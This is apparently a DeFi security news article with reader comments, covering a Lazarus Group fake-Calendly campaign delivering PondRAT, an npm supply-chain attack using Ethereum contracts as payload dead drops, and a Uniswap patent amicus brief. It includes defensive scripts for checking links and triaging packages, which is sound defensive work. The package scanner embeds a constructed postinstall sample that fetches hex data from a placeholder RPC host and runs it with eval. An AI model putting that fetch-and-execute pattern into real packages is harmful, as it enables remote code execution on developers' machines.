TL;DR
- North Korean Lazarus Group launches renewed social engineering campaign against DeFi protocol teams using fake Calendly links
- PondRAT trojan identified as primary payload, designed for long-term persistence in corporate environments
- npm supply chain attack embeds malware using Ethereum smart contracts as dead drops for malicious payloads
- DeFi Education Fund and Solana Policy Institute file amicus brief defending Uniswap in patent lawsuit
- Security incidents highlight growing sophistication of attacks targeting DeFi infrastructure
September 4, 2025, brought a stark reminder that as decentralized finance grows in scale and influence, it also becomes an increasingly attractive target for sophisticated threat actors. Two separate security developments — one involving a state-sponsored hacking group and the other a novel supply chain attack — underscore the evolving risks facing DeFi protocol teams and their users.
Lazarus Group Deploys PondRAT Against DeFi Organizations
Security researchers have identified a renewed campaign by North Korea’s Lazarus Group specifically targeting DeFi protocol contributors and developers. The attack vector leverages fake Calendly scheduling links to initiate contact with victims, creating a convincing pretext that exploits the remote-first, meeting-heavy culture of the crypto industry.
Once a target engages with the fraudulent scheduling page, they are prompted to download what appears to be a legitimate meeting application or plugin. The actual payload is PondRAT, a remote access trojan designed for extended persistence within corporate networks. Unlike typical malware that seeks immediate financial gain, PondRAT is built for long-term surveillance and credential harvesting — consistent with Lazarus Group’s well-documented strategy of infiltrating organizations before executing large-scale thefts.
The targeting of DeFi protocol contributors specifically indicates a strategic shift. Rather than attacking smart contracts directly, Lazarus appears to be focused on gaining access to protocol administration keys, multisig wallets, and internal governance mechanisms. This approach could enable thefts that bypass on-chain security measures entirely by compromising the human operators who control protocol upgrade paths and treasury management.
For DeFi organizations, the campaign reinforces the need for rigorous operational security practices, including hardware key management, segregated development environments, and mandatory security training for all team members who handle protocol infrastructure.
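One cheap control that follows from the campaign described above is to triage unsolicited scheduling links before anyone clicks them. The script below is an added example written for this article, not tooling from any of the organizations mentioned: it checks a link against an allow-list of expected scheduling hosts (the allow-list and the sample URLs are constructed for the example) and flags the warning signs that a fake Calendly page tends to show, such as a lookalike domain, a punycode or non-ASCII hostname, or a link that resolves straight to an installer rather than a booking page.

```python
from urllib.parse import urlsplit
import ipaddress

# Hostnames the team expects scheduling links to come from.
# Constructed for this example; a real team would maintain its own list.
ALLOWED_HOSTS = ("calendly.com",)

# A scheduling link should never lead directly to an installer or archive.
INSTALLER_SUFFIXES = (".dmg", ".pkg", ".exe", ".msi", ".zip", ".sh", ".app")


def host_matches(host, allowed):
    """True when host equals an allowed host or is a real subdomain of it.

    Matching on whole labels avoids accepting 'calendly.com.evil.example'.
    """
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def assess_link(url, allowed=ALLOWED_HOSTS):
    """Return ('ok' | 'suspicious', [reasons]) for a link from an unsolicited message."""
    if "://" not in url:
        url = "https://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []

    if parts.scheme != "https":
        reasons.append("not https")
    if parts.username or parts.password:
        reasons.append("credentials embedded before the hostname")
    if not host.isascii() or any(lbl.startswith("xn--") for lbl in host.split(".")):
        reasons.append("internationalized/punycode hostname (homoglyph risk)")
    try:
        ipaddress.ip_address(host)
        reasons.append("raw IP address instead of a hostname")
    except ValueError:
        pass  # normal case: not an IP literal
    if parts.path.lower().endswith(INSTALLER_SUFFIXES):
        reasons.append("link points at an installer or archive")
    if not host_matches(host, allowed):
        reasons.append("host not on the allow-list")
        # The brand name appearing inside an unrelated domain is the classic lookalike.
        for a in allowed:
            brand = a.split(".")[0]
            if brand in host.replace("-", ""):
                reasons.append(f"lookalike of {a}")

    return ("ok" if not reasons else "suspicious", reasons)


if __name__ == "__main__":
    # Constructed sample links for demonstration only.
    for sample in (
        "https://calendly.com/alice/30min",
        "https://calendly.com.meeting-setup.example/alice",
        "https://calendly.com/alice/MeetingPlugin.dmg",
    ):
        print(sample, "->", assess_link(sample))
```

The allow-list match is deliberately done on whole DNS labels rather than with a substring test, because "calendly.com" appearing anywhere in a hostname is exactly what a lookalike domain relies on. A verdict of "suspicious" is a prompt for a human to verify the meeting through a channel the team already trusts, not a decision the script makes on its own.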
Ethereum Smart Contracts Weaponized in npm Supply Chain Attack
In a separate but equally concerning development, researchers have documented a supply chain attack that embeds malicious payloads within npm (Node Package Manager) libraries. The attack uses Ethereum smart contracts as a dead drop or retrieval mechanism for malware, representing a significant evolution in how blockchain infrastructure is being weaponized.
The attack chain works by publishing compromised npm packages that appear legitimate to developers building decentralized applications. When the package is installed and executed, it communicates with specific Ethereum smart contracts to retrieve malicious instructions or additional payloads. Because the command-and-control infrastructure lives on-chain, it is extremely difficult for traditional security tools to detect or block.
This technique exploits a fundamental tension in the DeFi ecosystem: the same blockchain infrastructure that provides transparency and immutability can also serve as an unblockable communication channel for malicious actors. Firewall rules and network monitoring — standard enterprise security measures — are ineffective against data retrieved directly from the Ethereum blockchain through RPC endpoints.
The attack represents a convergence of traditional software supply chain compromises with Web3-native techniques. Developers building DeFi protocols are particularly vulnerable because their workflows regularly involve installing and testing new packages from the npm ecosystem, and the use of Ethereum RPC connections is considered normal operational behavior.
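Network controls cannot see a payload fetched through an Ethereum RPC call, so the place to catch the pattern described above is the package itself, before it is installed. The triage script below is an added example written for this article, not code from any of the researchers or projects it mentions. It walks a package's files (here a constructed in-memory sample, with a placeholder contract address and an RPC URL on a reserved example domain) and reports the combination that should never appear in an ordinary utility library: a lifecycle script that runs at install time, read-only Ethereum JSON-RPC calls such as eth_call, a hard-coded contract address, and decoding of the returned data into something that is then executed.

```python
import json
import re
from dataclasses import dataclass

# Signals a reviewer looks for in a package that has no reason to talk to a
# blockchain node at install time. The method list is not exhaustive.
RPC_METHODS = re.compile(r"\beth_(call|getStorageAt|getLogs|getCode|getTransactionByHash)\b")
CONTRACT_ADDR = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
DYNAMIC_EXEC = re.compile(r"\b(eval|new Function|child_process|execSync|spawn)\b")
DECODE = re.compile(r"Buffer\.from\(.*?['\"](base64|hex)['\"]\s*\)|\batob\(")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


@dataclass
class Finding:
    file: str
    reason: str


def triage_package(files):
    """Scan {path: source} for install-time hooks and on-chain dead-drop behaviour."""
    findings = []
    pkg = json.loads(files.get("package.json", "{}"))
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(Finding("package.json", f"lifecycle script '{hook}': {cmd}"))
    for path, src in files.items():
        if not path.endswith((".js", ".mjs", ".cjs")):
            continue
        if RPC_METHODS.search(src):
            findings.append(Finding(path, "Ethereum JSON-RPC read call"))
        if CONTRACT_ADDR.search(src):
            findings.append(Finding(path, "hard-coded contract address"))
        if DYNAMIC_EXEC.search(src):
            findings.append(Finding(path, "dynamic code execution"))
        if DECODE.search(src):
            findings.append(Finding(path, "base64/hex decoding of fetched data"))
    return findings


def risk_level(findings):
    """Combine signals: on-chain reads feeding dynamic execution is the dead-drop shape."""
    reasons = [f.reason for f in findings]
    on_chain = any("JSON-RPC" in r or "contract address" in r for r in reasons)
    executes = any("dynamic code" in r for r in reasons)
    hooked = any("lifecycle" in r for r in reasons)
    if on_chain and executes:
        return "high"
    if on_chain or (hooked and executes):
        return "medium"  # a web3 library legitimately calls eth_call; review, don't block
    return "low" if findings else "none"


# Constructed sample package showing the shape of the technique. The contract
# address is a placeholder and the RPC endpoint is a reserved example domain.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-utils", "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
    }),
    "setup.js": (
        "// constructed illustration for the detector, not a real package\n"
        "const body = JSON.stringify({jsonrpc: '2.0', id: 1, method: 'eth_call',\n"
        "  params: [{to: '0x1212121212121212121212121212121212121212', data: '0x'}, 'latest']});\n"
        "fetch('https://rpc.example/eth', {method: 'POST', body}).then(r => r.json())\n"
        "  .then(j => eval(Buffer.from(j.result.slice(2), 'hex').toString()));\n"
    ),
    "index.js": "module.exports = { add: (a, b) => a + b };\n",
}


if __name__ == "__main__":
    found = triage_package(SAMPLE_PACKAGE)
    for f in found:
        print(f"{f.file}: {f.reason}")
    print("risk:", risk_level(found))
```

The scoring deliberately separates the signals: a genuine Web3 SDK will contain eth_call and contract addresses, so those alone only earn a medium rating for review, while the pairing of an on-chain read with eval or a child process is what distinguishes a dead drop from a library. Running this in CI against a lockfile's resolved packages, alongside an install flag such as npm's --ignore-scripts, turns the page's observation about RPC traffic looking normal into a check that does not depend on the network layer at all.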
Uniswap Patent Defense Draws Industry Support
Amid the security concerns, the DeFi community has rallied around a different kind of defense. The DeFi Education Fund (DEF) and the Solana Policy Institute have jointly filed an amicus brief supporting Uniswap in an ongoing patent infringement lawsuit. The filing argues against the patentability of mathematical formulas governing Automated Market Makers and exchange rate calculations.
The core argument is straightforward but consequential: if the mathematical models embedded in AMM code can be patented, it would fundamentally undermine the open-source ethos that has driven DeFi innovation. The ability to freely compose, fork, and iterate on protocol designs has been central to the rapid evolution of decentralized exchange mechanisms, lending protocols, and derivative platforms.
The amicus brief positions the lawsuit as a test case for the boundaries of intellectual property in decentralized finance. A ruling that validates broad AMM patents could create a chilling effect on protocol development, forcing builders to navigate a patent landscape that was never designed for composable, open-source financial infrastructure. Conversely, a decision favoring Uniswap could establish important precedents protecting the right to implement mathematical and algorithmic innovations in DeFi without fear of litigation.
Implications for DeFi Security Posture
The combination of the Lazarus social engineering campaign and the npm supply chain attack reveals a common theme: threat actors are increasingly targeting the human and software development layers of DeFi rather than the smart contracts themselves. This shift makes sense from an attacker’s perspective. Smart contract audits, formal verification, and bug bounty programs have made direct protocol exploits progressively harder to execute. In response, attackers are pivoting to the softer targets around the protocol — the developers, administrators, and tooling that keep DeFi systems running.
For the broader DeFi ecosystem, these incidents argue for a more holistic approach to security that extends beyond code audits. Organizations need to invest in operational security training, supply chain integrity verification, and incident response procedures that account for compromises at the infrastructure and personnel level. The era of treating smart contract security as synonymous with DeFi security is over.
Why This Matters
The security landscape of September 4, 2025, illustrates a maturing threat environment for decentralized finance. As DeFi protocols manage increasingly large treasuries and serve growing user bases, the incentives for sophisticated attacks will only increase. The Lazarus Group’s targeted approach and the novel use of blockchain infrastructure for malware delivery demonstrate that adversaries are evolving as quickly as the protocols they target. The industry’s response — through legal defenses, security research, and community coordination — will determine whether DeFi can maintain its resilience as it scales.
Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. DeFi investments carry significant risk including smart contract vulnerabilities and market volatility. Always conduct your own research before participating in any DeFi protocol.
using ethereum smart contracts as dead drops is genuinely clever. lazarus keeps evolving their opsec
Every DeFi team should be running mandatory security training. Fake Calendly links should not be working in 2025.
^ hard to train everyone when most defi teams are 5 people working across 4 timezones wearing hoodies
The Uniswap amicus brief is the real story here. Patent trolls going after DeFi protocols is going to be the next big fight.